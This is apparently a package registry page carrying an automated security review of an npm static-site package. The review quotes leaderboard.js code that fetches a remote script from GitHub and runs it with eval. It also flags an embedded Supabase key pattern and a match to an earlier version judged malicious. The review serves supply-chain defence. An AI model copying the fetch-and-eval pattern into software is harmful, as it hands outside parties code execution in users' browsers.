registry  /  grapes-andrewdingus  /  1.0.27

grapes-andrewdingus@1.0.27

GRAPES OS static site — CDN-ready via unpkg

AI Security Review

scanned 2d ago · by lpm-firewall-ai

The package contains a static site leaderboard page that loads remote JavaScript from GitHub and executes it with eval. This gives the remote repository control over code run in users' browsers when the leaderboard page is opened.

Static reason
High-risk behavior combination matched malicious policy.; source matched previously finalized malicious package; routed for review; source fingerprint signature matched known malicious package; routed for review
Trigger
Runtime visit to leaderboard.html
Impact
Arbitrary browser-side code execution in the package page context; potential credential/session/localStorage access or redirection if the remote payload changes
Mechanism
remote JavaScript fetch followed by eval
Attack narrative
When a user opens leaderboard.html, the included assets/js/leaderboard.js fetches a remote scores.js file from raw.githubusercontent.com and passes the returned text directly to eval. Although named as leaderboard data, this is executable code controlled outside the npm tarball, allowing post-publish payload changes in browser context.
Rationale
Direct source inspection confirms a concrete remote-code execution surface via fetch plus eval, not just a scanner label. Lack of install hooks lowers npm install-time risk, but the CDN/static-site package intentionally exposes runtime arbitrary remote execution. Product guard normalized a non-low false-positive publish_block request to warn-only suspicious.
Evidence
package.jsonleaderboard.htmlassets/js/leaderboard.jsassets/js/app_functions.js
Network endpoints3
raw.githubusercontent.com/grapes-os/grapes-os-leaderboard/main/scores.jshqlgppguxhqeaonjzinv.supabase.cocdn.jsdelivr.net/npm/@supabase/supabase-js@2

Decision evidence

public snapshot
AI called this Suspicious at 94.0% confidence as Malware with medium false-positive risk.
Evidence for block
  • assets/js/leaderboard.js fetches https://raw.githubusercontent.com/grapes-os/grapes-os-leaderboard/main/scores.js
  • assets/js/leaderboard.js immediately evals fetched response text in the browser
  • leaderboard.html includes assets/js/leaderboard.js as a deferred runtime script
  • package.json homepage points to unrelated https://unpkg.com/bypass-sam1@latest/
Evidence against
  • package.json has no install/preinstall/postinstall lifecycle scripts
  • Main package surface is a static site with HTML/CSS/JS assets
  • assets/js/app_functions.js Supabase anon key is used for public app listing RPCs, not credential harvesting
  • No filesystem, child_process, persistence, or npm-time execution found
Behavioral surface
Source
EvalNetwork
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 9 file(s), 41.9 KB of source, external domains: 1.australianhuntermag.com.au, 1.belizebuilders.com, 1.burgermap.org, 1.chowpatty.com, 1.deleesportsmedicine.com, 1.lscomm.net, 1.oceanracingseries.co.za, 1.rodolfocolen.com, 1.room4rent.cl, 1.rootsbobcat.com, 1.southwestvoodoo.com, 1.tartsandcrafts.ca, 1.tomholden.info, 1.videospeed.cl, 1.vivocolor.cl, 2.intothelightprod.com, 2.macao.net, 57.admain.cl, acetaminophen.deleesportsmedicine.com, acting.intothelightprod.com, adsadkjsadjksakldjxx.math-solver.online, agent.room4rent.cl, alpha.y.glenwaverleychurches.org, antihistamines.medscience.cl, api.cloud.rigaprecast.com, app.cloud.rigaprecast.com, attractions.uk.to, aurora.xyz.moochurch.com, b.j0.icom.org.np, backend.development.sanluix.org, basketball.prosports.cl, behavior.lasersoft.net.au, beta.y.glenwaverleychurches.org, biology-img.shekinahphotography.com, blog.cloud.rigaprecast.com, boeing.morlockaerospace.com, books.michelleingah.com, ca.skimanshop.it, carriers.mobile-node.net, cdn.businessrelay.co.za, cdn.i-mind.cl, cdn.masonic-lodge.ca, cdn.yourciooncall.com, cheap.showmyhomes.com, cheap.winterhouse.info, china.dingshun.hk, china.taoism-dingshun.org, construct.rustyfoundation.com, coolmathgames.com, cultures.linexedu.eu

Source & flagged code

6 flagged · loading source
assets/js/app_functions.jsView file
3patternName = supabase_service_key severity = critical line = 3 matchedText = "eyJhbGc...w8";
Critical
Critical Secret

Package contains a critical-looking secret pattern.

assets/js/app_functions.jsView on unpkg · L3
3patternName = supabase_service_key severity = critical line = 3 matchedText = "eyJhbGc...w8";
Critical
Secret Pattern

Supabase service role key (JWT) in assets/js/app_functions.js

assets/js/app_functions.jsView on unpkg · L3
assets/js/leaderboard.jsView file
36async function getScores() { L37: let response = await fetch( L38: "https://raw.githubusercontent.com/grapes-os/grapes-os-leaderboard/main/scores.js", L39: ); L40: return await response.text(); // is promise for whatever reason L41: } ... L45: let js_code = await getScores(); L46: eval(js_code); // never use eval L47: } catch (e) {
Critical
Remote Asset Decode Execute

Source fetches a remote non-code asset, decodes its contents, and dynamically executes the decoded payload.

assets/js/leaderboard.jsView on unpkg · L36
45let js_code = await getScores(); L46: eval(js_code); // never use eval L47: } catch (e) {
High
Eval

Package source references dynamic code evaluation.

assets/js/leaderboard.jsView on unpkg · L45
matchType = normalized_sha256 matchedPackage = grapes-andrewdingus@1.0.25 matchedPath = assets/js/leaderboard.js matchedIdentity = npm:Z3JhcGVzLWFuZHJld2Rpbmd1cw:1.0.25 similarity = 1.000 summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

assets/js/leaderboard.jsView on unpkg
matchType = malicious_source_fingerprint_signature signature = 26a6083a366a497c signatureType = suspicious_hashes sourceLabel = final_verdict:malicious matchedPackage = grapes-andrewdingus@1.0.25 matchedPath = assets/js/leaderboard.js matchedIdentity = npm:Z3JhcGVzLWFuZHJld2Rpbmd1cw:1.0.25 similarity = 1.000 shingleOverlap = 5 summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

assets/js/leaderboard.jsView on unpkg

Findings

3 Critical3 High2 Medium2 Low
CriticalCritical Secretassets/js/app_functions.js
CriticalRemote Asset Decode Executeassets/js/leaderboard.js
CriticalSecret Patternassets/js/app_functions.js
HighEvalassets/js/leaderboard.js
HighKnown Malware Source Similarityassets/js/leaderboard.js
HighKnown Malware Source Fingerprint Signatureassets/js/leaderboard.js
MediumNetwork
MediumStructural Risk Force Deep Review
LowHigh Entropy Strings
LowUrl Strings